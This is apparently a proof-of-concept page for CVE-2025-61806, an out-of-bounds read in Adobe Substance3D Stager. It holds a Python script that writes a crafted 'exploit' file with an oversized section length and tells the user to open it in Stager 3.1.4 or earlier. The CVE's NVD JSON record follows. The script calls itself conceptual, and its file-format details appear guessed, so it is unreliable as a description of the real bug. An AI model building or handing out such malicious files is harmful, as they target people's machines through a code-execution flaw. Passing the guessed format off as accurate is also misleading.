CVE-2025-61806

# CVE-2025-61806 - Adobe Substance3D Stager Out-of-Bounds Read PoC # This is a conceptual PoC demonstrating the vulnerability trigger mechanism. # The actual exploitation requires crafting a malicious file that causes # the parser to read beyond allocated memory boundaries. import struct import os def craft_malicious_stager_file(output_path): """ Generate a crafted file that triggers out-of-bounds read in Substance3D Stager during file parsing. The vulnerability occurs when the parser fails to validate field lengths or offsets, leading to reads past allocated buffers. """ # File header - mimics valid Substance3D Stager file format header = b'SBSR' # Magic bytes header += struct.pack('<I', 1) # Version # Malicious section with oversized length field # This triggers the OOB read when parser uses this value # to determine how much data to read from the buffer section_type = struct.pack('<I', 0x0A) # Section type identifier # Intentionally oversized length value (0xFFFF = 65535 bytes) # Parser will attempt to read 65535 bytes from a much smaller buffer declared_length = struct.pack('<I', 0xFFFF) # Actual data is much smaller than declared length actual_data = b'\x00' * 64 # Only 64 bytes of actual data # Construct the malicious file malicious_content = header + section_type + declared_length + actual_data with open(output_path, 'wb') as f: f.write(malicious_content) print(f"[+] Crafted malicious file saved to: {output_path}") print(f"[!] File size: {len(malicious_content)} bytes") print(f"[!] Declared section length: 65535 bytes (causes OOB read)") print(f"[!] Actual data length: {len(actual_data)} bytes") print(f"\n[*] To trigger: Open this file in Substance3D Stager <= 3.1.4") if __name__ == "__main__": output = "exploit_cve_2025_61806.sbs" craft_malicious_stager_file(output)

{"cve": {"id": "CVE-2025-61806", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:53.257", "lastModified": "2025-10-16T17:37:26.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}